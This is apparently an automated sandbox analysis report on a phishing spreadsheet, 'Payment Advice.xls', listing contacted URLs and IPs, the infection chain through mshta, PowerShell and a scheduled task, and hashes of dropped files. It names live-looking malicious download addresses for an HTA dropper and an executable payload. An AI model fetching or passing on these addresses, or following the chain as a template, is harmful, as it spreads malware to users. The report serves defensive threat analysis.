Source: mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..
Source: mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://crl.entrust.n?
Source: mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k
Source: mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
high
Name: http://www.ibsensoftware.com/
Source: rrwscqkDSNwLK.exe, rrwscqkDSNwLK.exe, 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
high
Name: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
high
Name: https://provit.uk/
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
high
Name: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
high
Name: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf
Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://go.micros
Source: powershell.exe, 00000005.00000002.454706317.0000000003632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
high
Name: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k
Source: mshta.exe, 00000004.00000002.431523218.000000000049A000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc
Source: mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: https://contoso.com/
Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
high
Name: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
high
Name: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:
Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506294361.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.504008484.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512306912.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://192.3.243.136/55/caspol.exep
Source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://ocsp.entrust.net0D
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
high
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.454706317.0000000002271000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 0000000B.00000002.470705091.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.0000000002181000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.0000000002581000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
high
Name: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf
Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadfmshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://192.3.243.136/55/caspol.epowershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://provit.uk/Jmshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://provit.uk/:mshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep5WrrwscqkDSNwLK.exe, 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionketmshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://192.3.243.136/55/caspol.exe6powershell.exe, 0000001F.00000002.523691740.000000001AF69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHfmshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htahtmshta.exe, 00000004.00000003.431264903.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510361814.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506573800.0000000002C25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
IP              Domain     Country        ASN    ASN Name           Malicious
198.244.140.41  provit.uk  United States  18630  RIDLEYSD-NETUS     false
192.3.243.136   unknown    United States  36352  AS-COLOCROSSINGUS  true
94.156.177.41   unknown    Bulgaria       43561  NET1-ASBG          true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559095
Start date and time: 2024-11-20 07:55:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes: 47
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment Advice.xls
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winXLS@52/60@3/3
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 128
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 3424 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 3492 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
01:56:32  API Interceptor  117x Sleep call for process: mshta.exe modified
01:56:36  API Interceptor  341x Sleep call for process: powershell.exe modified
01:56:48  API Interceptor  1415x Sleep call for process: caspol.exe modified
01:56:50  API Interceptor  5x Sleep call for process: schtasks.exe modified
01:56:53  API Interceptor  116x Sleep call for process: AcroRd32.exe modified
01:56:56  API Interceptor  53x Sleep call for process: rrwscqkDSNwLK.exe modified
01:56:56  API Interceptor  176x Sleep call for process: taskeng.exe modified
22:56:55  Task Scheduler   Run new task: rrwscqkDSNwLK path: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4742
                                                                    Entropy (8bit):4.8105940880640246
                                                                    Encrypted:false
                                                                    SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                    MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                    SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                    SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                    SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:modified
                                                                    Size (bytes):182352
                                                                    Entropy (8bit):2.3378885496144393
                                                                    Encrypted:false
                                                                    SSDEEP:96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
                                                                    MD5:4CE3B0E612E1968B6C491AB1AB818884
                                                                    SHA1:CBC890A816E9B7E993C90FB63D51526A76616323
                                                                    SHA-256:A786CB2AE0DC8117E3BFC07BCA8BB0E5D4545AB8F5B4AA042C9EE85DCA7B43A0
                                                                    SHA-512:9B87141B10A2E781E51483DCED485817AEB34B545F6DBF64803B4B3621CD4DD74587A5033AB1AA3B931FBD39BC7C77650A0CCDD6B4132B48FBEAB9D0FBB3D816
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta, Author: Joe Security
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):1504468
                                                                    Entropy (8bit):1.7693060102813485
                                                                    Encrypted:false
                                                                    SSDEEP:3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
                                                                    MD5:EF3C18CC49B02153C770DB977B2E7435
                                                                    SHA1:D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
                                                                    SHA-256:F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
                                                                    SHA-512:2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):1296688
                                                                    Entropy (8bit):3.591660498552015
                                                                    Encrypted:false
                                                                    SSDEEP:6144:JQmd3s01u2uIfTlw35Y5kndm9wHiT53ZkyOmCl6PV2yuxOKNOKj:vNWQTi35JH1RW7vz4
                                                                    MD5:D00A1317B51C58FCF05D3B801FF5A898
                                                                    SHA1:6B610957FC045D55DEB7A55616302F9186AA2E6C
                                                                    SHA-256:800C36FBCC44628AC220EBB68BA7DCDED8E53217E9EE90C638A9DB20FE657A5E
                                                                    SHA-512:54646FBA5458D5FEE036C130C469550F165AFAE977707A0F41008D677463AF111D19D203CC369F22DDE51CF788754E033CB6F4845E6E87F05BA2AF82975DB870
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):3064680
                                                                    Entropy (8bit):1.8507381356738084
                                                                    Encrypted:false
                                                                    SSDEEP:6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
                                                                    MD5:93774BB9AECD3837D6496AE965D1BD80
                                                                    SHA1:AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
                                                                    SHA-256:6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
                                                                    SHA-512:3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):3191264
                                                                    Entropy (8bit):2.0118490192617995
                                                                    Encrypted:false
                                                                    SSDEEP:6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
                                                                    MD5:04A17584C7203C47419D4AC2163B98C6
                                                                    SHA1:485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
                                                                    SHA-256:EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
                                                                    SHA-512:043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
